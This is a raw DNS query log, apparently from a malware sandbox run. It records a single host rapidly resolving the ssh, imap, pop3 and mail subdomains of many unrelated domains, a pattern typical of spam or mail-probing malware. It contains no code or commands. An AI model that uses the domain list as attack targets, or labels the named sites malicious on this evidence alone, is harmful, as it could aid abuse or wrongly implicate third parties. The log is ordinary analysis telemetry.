Dec 22, 2023 21:15:01.245589972 CET	192.168.2.4	1.1.1.1	0x51b2	Standard query (0)	ssh.studnets.ocps.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.246058941 CET	192.168.2.4	1.1.1.1	0x631f	Standard query (0)	ssh.hermanassociatesnewyork.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.262561083 CET	192.168.2.4	1.1.1.1	0x6ee	Standard query (0)	nhclex.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.262561083 CET	192.168.2.4	1.1.1.1	0x6e1	Standard query (0)	ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.262918949 CET	192.168.2.4	1.1.1.1	0xe73	Standard query (0)	ssh.mercor.compl	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.357711077 CET	192.168.2.4	1.1.1.1	0x22ad	Standard query (0)	ssh.taylorbryant.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.361356974 CET	192.168.2.4	1.1.1.1	0x5e43	Standard query (0)	dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.361474991 CET	192.168.2.4	1.1.1.1	0x8ff8	Standard query (0)	pop.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.361524105 CET	192.168.2.4	1.1.1.1	0x58ee	Standard query (0)	ssh.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.361721039 CET	192.168.2.4	1.1.1.1	0xa8ef	Standard query (0)	ssh.vesond.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.361721039 CET	192.168.2.4	1.1.1.1	0xe255	Standard query (0)	mail.91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.362037897 CET	192.168.2.4	1.1.1.1	0x1370	Standard query (0)	pop.hyiquu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.365428925 CET	192.168.2.4	1.1.1.1	0x1be9	Standard query (0)	ssh.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.390224934 CET	192.168.2.4	1.1.1.1	0x87ae	Standard query (0)	firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.392951012 CET	192.168.2.4	1.1.1.1	0xd203	Standard query (0)	ssh.hodginssmithconsulting.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.426803112 CET	192.168.2.4	1.1.1.1	0xec58	Standard query (0)	ssh.gpa.orgau	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.428119898 CET	192.168.2.4	1.1.1.1	0x3f90	Standard query (0)	ssh.djaskdas.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.428119898 CET	192.168.2.4	1.1.1.1	0x631f	Standard query (0)	ssh.hermanassociatesnewyork.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.453497887 CET	192.168.2.4	1.1.1.1	0x7b4a	Standard query (0)	mailgate.valentinegrowers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.454077959 CET	192.168.2.4	1.1.1.1	0xe77b	Standard query (0)	ssh.freedhal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.456335068 CET	192.168.2.4	1.1.1.1	0xe166	Standard query (0)	pkmanagment.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.484901905 CET	192.168.2.4	1.1.1.1	0x4b04	Standard query (0)	excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.485750914 CET	192.168.2.4	1.1.1.1	0xe924	Standard query (0)	ssh.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.498588085 CET	192.168.2.4	1.1.1.1	0x2ce5	Standard query (0)	ssh.rio-perfume.orgua	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.498859882 CET	192.168.2.4	1.1.1.1	0xd00	Standard query (0)	mail.integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.511238098 CET	192.168.2.4	1.1.1.1	0x7d04	Standard query (0)	sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.511641979 CET	192.168.2.4	1.1.1.1	0x4087	Standard query (0)	ssh.e-manage.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.511857986 CET	192.168.2.4	1.1.1.1	0x46a9	Standard query (0)	ssh.sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.512131929 CET	192.168.2.4	1.1.1.1	0xf29e	Standard query (0)	ssh.earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.513514042 CET	192.168.2.4	1.1.1.1	0x5e43	Standard query (0)	dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.513556957 CET	192.168.2.4	1.1.1.1	0x1be9	Standard query (0)	ssh.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.513746023 CET	192.168.2.4	1.1.1.1	0xfd8d	Standard query (0)	ssh.dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.513926029 CET	192.168.2.4	1.1.1.1	0xc473	Standard query (0)	ssh.chemcaregroup.compg	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.514211893 CET	192.168.2.4	1.1.1.1	0x99da	Standard query (0)	ssh.djmeca.com.ca	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.514211893 CET	192.168.2.4	1.1.1.1	0x25f	Standard query (0)	pop3.gn.ais.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.521282911 CET	192.168.2.4	1.1.1.1	0x4442	Standard query (0)	cominex.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.521523952 CET	192.168.2.4	1.1.1.1	0xe535	Standard query (0)	ssh.integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.552274942 CET	192.168.2.4	1.1.1.1	0x24ba	Standard query (0)	imap.mywitce.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.552323103 CET	192.168.2.4	1.1.1.1	0xd203	Standard query (0)	ssh.hodginssmithconsulting.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.555670023 CET	192.168.2.4	1.1.1.1	0xf786	Standard query (0)	mail.e-manage.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.572479010 CET	192.168.2.4	1.1.1.1	0x3f90	Standard query (0)	ssh.djaskdas.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.572479010 CET	192.168.2.4	1.1.1.1	0xf61e	Standard query (0)	joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.572712898 CET	192.168.2.4	1.1.1.1	0x6a7f	Standard query (0)	dresslermd.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.681344986 CET	192.168.2.4	1.1.1.1	0xe924	Standard query (0)	ssh.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.681411982 CET	192.168.2.4	1.1.1.1	0x7d04	Standard query (0)	sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.704874992 CET	192.168.2.4	1.1.1.1	0x302d	Standard query (0)	imap.rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.705477953 CET	192.168.2.4	1.1.1.1	0x24ba	Standard query (0)	imap.mywitce.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.723381996 CET	192.168.2.4	1.1.1.1	0x259d	Standard query (0)	mailgate.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.764734030 CET	192.168.2.4	1.1.1.1	0x5959	Standard query (0)	imap.154892628.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.765027046 CET	192.168.2.4	1.1.1.1	0xc97	Standard query (0)	mail.hermanassociatesnewyork.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.765265942 CET	192.168.2.4	1.1.1.1	0x3b0c	Standard query (0)	mail.srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.765449047 CET	192.168.2.4	1.1.1.1	0xd032	Standard query (0)	ssh.154892628.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.774496078 CET	192.168.2.4	1.1.1.1	0x51c8	Standard query (0)	ssh.bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.775255919 CET	192.168.2.4	1.1.1.1	0xd166	Standard query (0)	mail.freedhal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.778547049 CET	192.168.2.4	1.1.1.1	0xe6b	Standard query (0)	ssh.select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.781269073 CET	192.168.2.4	1.1.1.1	0x6313	Standard query (0)	ssh.cominex.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.782658100 CET	192.168.2.4	1.1.1.1	0x8fe8	Standard query (0)	imap.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.783126116 CET	192.168.2.4	1.1.1.1	0x16c8	Standard query (0)	mailgate.freedhal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.786546946 CET	192.168.2.4	1.1.1.1	0x11b2	Standard query (0)	smtp.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.801322937 CET	192.168.2.4	1.1.1.1	0x67f9	Standard query (0)	imap.hodginssmithconsulting.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.890707016 CET	192.168.2.4	1.1.1.1	0x259d	Standard query (0)	mailgate.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.918848991 CET	192.168.2.4	1.1.1.1	0xc97	Standard query (0)	mail.hermanassociatesnewyork.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.918924093 CET	192.168.2.4	1.1.1.1	0x340	Standard query (0)	imap.souriahost.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.918967009 CET	192.168.2.4	1.1.1.1	0x5959	Standard query (0)	imap.154892628.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.920164108 CET	192.168.2.4	1.1.1.1	0x5d6	Standard query (0)	imap.263host.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.921396017 CET	192.168.2.4	1.1.1.1	0x5d41	Standard query (0)	imap.djaskdas.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.937141895 CET	192.168.2.4	1.1.1.1	0x4de9	Standard query (0)	imap.gn.ais.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.942121029 CET	192.168.2.4	1.1.1.1	0xb3aa	Standard query (0)	caribbean360-com.p30.spamhero.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.943142891 CET	192.168.2.4	1.1.1.1	0x8fe8	Standard query (0)	imap.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.943203926 CET	192.168.2.4	1.1.1.1	0x51c8	Standard query (0)	ssh.bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.971029997 CET	192.168.2.4	1.1.1.1	0xd06	Standard query (0)	imap.dresslermd.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.974173069 CET	192.168.2.4	1.1.1.1	0x505e	Standard query (0)	pop3.acaiforcemaxweightloss.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.014038086 CET	192.168.2.4	1.1.1.1	0x70fb	Standard query (0)	imap.chemcaregroup.compg	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.014724970 CET	192.168.2.4	1.1.1.1	0xb67a	Standard query (0)	imap.arbsdecq.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.024511099 CET	192.168.2.4	1.1.1.1	0xf6f9	Standard query (0)	mail.nsorekek.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.051450968 CET	192.168.2.4	1.1.1.1	0xdf91	Standard query (0)	imap.asdfhjlasdfhjlk1.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.075553894 CET	192.168.2.4	1.1.1.1	0xfa04	Standard query (0)	mail.gn.ais.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.075553894 CET	192.168.2.4	1.1.1.1	0x5d41	Standard query (0)	imap.djaskdas.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.075694084 CET	192.168.2.4	1.1.1.1	0x5d6	Standard query (0)	imap.263host.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.076637030 CET	192.168.2.4	1.1.1.1	0x429e	Standard query (0)	imap.9a07f8a339ec2a3e.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.108781099 CET	192.168.2.4	1.1.1.1	0x7982	Standard query (0)	imap.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.109411001 CET	192.168.2.4	1.1.1.1	0xb3aa	Standard query (0)	caribbean360-com.p30.spamhero.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.110510111 CET	192.168.2.4	1.1.1.1	0x678e	Standard query (0)	imap.cominex.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.110510111 CET	192.168.2.4	1.1.1.1	0x9466	Standard query (0)	imap.integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.113290071 CET	192.168.2.4	1.1.1.1	0xba2c	Standard query (0)	ssh.aurora-resorts.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.114706993 CET	192.168.2.4	1.1.1.1	0xeaa2	Standard query (0)	imap.sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.114706993 CET	192.168.2.4	1.1.1.1	0x51bd	Standard query (0)	imap.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.114959002 CET	192.168.2.4	1.1.1.1	0xa28a	Standard query (0)	imap.djmeca.com.ca	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.116444111 CET	192.168.2.4	1.1.1.1	0x565d	Standard query (0)	pop3.piiyuw.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.146462917 CET	192.168.2.4	1.1.1.1	0xd030	Standard query (0)	imap.hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.146950006 CET	192.168.2.4	1.1.1.1	0x6e12	Standard query (0)	imap.acaiforcemaxweightloss.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.151362896 CET	192.168.2.4	1.1.1.1	0xf17f	Standard query (0)	imap.sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.157243013 CET	192.168.2.4	1.1.1.1	0x8c12	Standard query (0)	pop3.cominex.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.157987118 CET	192.168.2.4	1.1.1.1	0x9e93	Standard query (0)	imap.vesond.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.158263922 CET	192.168.2.4	1.1.1.1	0x537c	Standard query (0)	imap.piiyuw.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.173696041 CET	192.168.2.4	1.1.1.1	0x94d1	Standard query (0)	pop3.djmeca.com.ca	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.175556898 CET	192.168.2.4	1.1.1.1	0x9ff0	Standard query (0)	imap.taylorbryant.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.175556898 CET	192.168.2.4	1.1.1.1	0x1d1b	Standard query (0)	relay.daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.187319040 CET	192.168.2.4	1.1.1.1	0xa452	Standard query (0)	pop3.chemcaregroup.compg	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.187319040 CET	192.168.2.4	1.1.1.1	0xf6f9	Standard query (0)	mail.nsorekek.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.187674999 CET	192.168.2.4	1.1.1.1	0xd8a6	Standard query (0)	pop3.9a07f8a339ec2a3e.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.187863111 CET	192.168.2.4	1.1.1.1	0x988f	Standard query (0)	imap.aurora-resorts.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.188183069 CET	192.168.2.4	1.1.1.1	0x17dc	Standard query (0)	pop3.aurora-resorts.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.188529015 CET	192.168.2.4	1.1.1.1	0xce7c	Standard query (0)	pop3.dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.200702906 CET	192.168.2.4	1.1.1.1	0x5db2	Standard query (0)	pop3.select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.200702906 CET	192.168.2.4	1.1.1.1	0xdf91	Standard query (0)	imap.asdfhjlasdfhjlk1.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.201141119 CET	192.168.2.4	1.1.1.1	0x5c64	Standard query (0)	imap.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.201786041 CET	192.168.2.4	1.1.1.1	0x6160	Standard query (0)	imap.dm.famm.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.201786041 CET	192.168.2.4	1.1.1.1	0xfd71	Standard query (0)	imap.bilfinger.comqa	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.202260017 CET	192.168.2.4	1.1.1.1	0xbb0a	Standard query (0)	pop3.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.202755928 CET	192.168.2.4	1.1.1.1	0x146d	Standard query (0)	pop3.dm.famm.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.203466892 CET	192.168.2.4	1.1.1.1	0x32a9	Standard query (0)	pop3.263host.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.203466892 CET	192.168.2.4	1.1.1.1	0x997a	Standard query (0)	pop3.saskgmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.205034018 CET	192.168.2.4	1.1.1.1	0xdc4a	Standard query (0)	pop3.sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.216763020 CET	192.168.2.4	1.1.1.1	0xca98	Standard query (0)	imap.studnets.ocps.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.266920090 CET	192.168.2.4	1.1.1.1	0x51bd	Standard query (0)	imap.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.267833948 CET	192.168.2.4	1.1.1.1	0x1b48	Standard query (0)	imap.saskgmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.321813107 CET	192.168.2.4	1.1.1.1	0xd030	Standard query (0)	imap.hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.321899891 CET	192.168.2.4	1.1.1.1	0xf17f	Standard query (0)	imap.sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.321938992 CET	192.168.2.4	1.1.1.1	0x537c	Standard query (0)	imap.piiyuw.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.322073936 CET	192.168.2.4	1.1.1.1	0x1d1b	Standard query (0)	relay.daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.322073936 CET	192.168.2.4	1.1.1.1	0x94d1	Standard query (0)	pop3.djmeca.com.ca	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.325365067 CET	192.168.2.4	1.1.1.1	0x3a02	Standard query (0)	mail.mobileuser.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.327502012 CET	192.168.2.4	1.1.1.1	0xa795	Standard query (0)	imap.mercor.compl	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.394840956 CET	192.168.2.4	1.1.1.1	0xdc4a	Standard query (0)	pop3.sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.394907951 CET	192.168.2.4	1.1.1.1	0x5db2	Standard query (0)	pop3.select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.394907951 CET	192.168.2.4	1.1.1.1	0x997a	Standard query (0)	pop3.saskgmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.394952059 CET	192.168.2.4	1.1.1.1	0xbb0a	Standard query (0)	pop3.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.409291029 CET	192.168.2.4	1.1.1.1	0x1c2f	Standard query (0)	pop3.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.434104919 CET	192.168.2.4	1.1.1.1	0x3721	Standard query (0)	pop3.taylorbryant.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.434458017 CET	192.168.2.4	1.1.1.1	0x5342	Standard query (0)	pop3.studnets.ocps.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.434978008 CET	192.168.2.4	1.1.1.1	0x6b7c	Standard query (0)	pop3.mywitce.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.575555086 CET	192.168.2.4	1.1.1.1	0x3a02	Standard query (0)	mail.mobileuser.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.576299906 CET	192.168.2.4	1.1.1.1	0xfb7c	Standard query (0)	pop3.arbsdecq.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.576482058 CET	192.168.2.4	1.1.1.1	0x153	Standard query (0)	mailgate.harrell-associates.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.577080011 CET	192.168.2.4	1.1.1.1	0x5e1e	Standard query (0)	imap.select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.592236996 CET	192.168.2.4	1.1.1.1	0x6b7c	Standard query (0)	pop3.mywitce.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.592324018 CET	192.168.2.4	1.1.1.1	0x3721	Standard query (0)	pop3.taylorbryant.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.593761921 CET	192.168.2.4	1.1.1.1	0x5edd	Standard query (0)	imap.jesusanswwers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.594022036 CET	192.168.2.4	1.1.1.1	0xa172	Standard query (0)	pop3.dresslermd.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.594547033 CET	192.168.2.4	1.1.1.1	0xab81	Standard query (0)	imap.rio-perfume.orgua	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.599008083 CET	192.168.2.4	1.1.1.1	0xa597	Standard query (0)	imap.pkmanagment.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.601663113 CET	192.168.2.4	1.1.1.1	0xe931	Standard query (0)	pop3.mercor.compl	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.602459908 CET	192.168.2.4	1.1.1.1	0x669a	Standard query (0)	pop3.souriahost.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.605061054 CET	192.168.2.4	1.1.1.1	0xe42f	Standard query (0)	caribbean360-com.p40.spamhero.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.612377882 CET	192.168.2.4	1.1.1.1	0x5c4f	Standard query (0)	pop3.earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.612377882 CET	192.168.2.4	1.1.1.1	0x4bda	Standard query (0)	pop3.154892628.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.624912024 CET	192.168.2.4	1.1.1.1	0xd36a	Standard query (0)	pop3.gpa.orgau	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.625730038 CET	192.168.2.4	1.1.1.1	0xbaf	Standard query (0)	pop3.vesond.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.626362085 CET	192.168.2.4	1.1.1.1	0xa77a	Standard query (0)	pop3.sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.626646042 CET	192.168.2.4	1.1.1.1	0xe366	Standard query (0)	pop3.pkmanagment.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.627108097 CET	192.168.2.4	1.1.1.1	0x9765	Standard query (0)	pop3.rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.627372980 CET	192.168.2.4	1.1.1.1	0xacd5	Standard query (0)	pop3.srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.627496958 CET	192.168.2.4	1.1.1.1	0x51f4	Standard query (0)	pop3.nhclex.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.628113031 CET	192.168.2.4	1.1.1.1	0x2514	Standard query (0)	pop3.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.628113031 CET	192.168.2.4	1.1.1.1	0xffd1	Standard query (0)	imap.bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.630424023 CET	192.168.2.4	1.1.1.1	0x8721	Standard query (0)	caribbean360-com.p10.spamhero.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.630597115 CET	192.168.2.4	1.1.1.1	0x7077	Standard query (0)	imap.earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.634738922 CET	192.168.2.4	1.1.1.1	0x8d59	Standard query (0)	imap.nhclex.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.634979963 CET	192.168.2.4	1.1.1.1	0xf979	Standard query (0)	imap.hyiquu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.636346102 CET	192.168.2.4	1.1.1.1	0xf409	Standard query (0)	imap.91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.643081903 CET	192.168.2.4	1.1.1.1	0x794e	Standard query (0)	mail.daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.643081903 CET	192.168.2.4	1.1.1.1	0x61c4	Standard query (0)	imap.dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.643327951 CET	192.168.2.4	1.1.1.1	0x1fb6	Standard query (0)	pop3.hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.649657011 CET	192.168.2.4	1.1.1.1	0x139d	Standard query (0)	pop3.hodginssmithconsulting.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.650974989 CET	192.168.2.4	1.1.1.1	0x6960	Standard query (0)	imap.hermanassociatesnewyork.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.651268959 CET	192.168.2.4	1.1.1.1	0x9cc1	Standard query (0)	imap.freedhal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.654350996 CET	192.168.2.4	1.1.1.1	0x9283	Standard query (0)	pop3.jesusanswwers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.654350996 CET	192.168.2.4	1.1.1.1	0x6d4a	Standard query (0)	imap.nsorekek.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.654978991 CET	192.168.2.4	1.1.1.1	0x83cf	Standard query (0)	pop3.rio-perfume.orgua	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.654978991 CET	192.168.2.4	1.1.1.1	0x8f91	Standard query (0)	pop3.asdfhjlasdfhjlk1.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.049838066 CET	192.168.2.4	1.1.1.1	0x153	Standard query (0)	mailgate.harrell-associates.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.049868107 CET	192.168.2.4	1.1.1.1	0x5c4f	Standard query (0)	pop3.earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.049904108 CET	192.168.2.4	1.1.1.1	0xe42f	Standard query (0)	caribbean360-com.p40.spamhero.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.049904108 CET	192.168.2.4	1.1.1.1	0x669a	Standard query (0)	pop3.souriahost.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.049977064 CET	192.168.2.4	1.1.1.1	0x7077	Standard query (0)	imap.earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.050035954 CET	192.168.2.4	1.1.1.1	0xffd1	Standard query (0)	imap.bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.050048113 CET	192.168.2.4	1.1.1.1	0xa77a	Standard query (0)	pop3.sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.050077915 CET	192.168.2.4	1.1.1.1	0xbaf	Standard query (0)	pop3.vesond.com	A (IP address)	IN (0x0001)	false
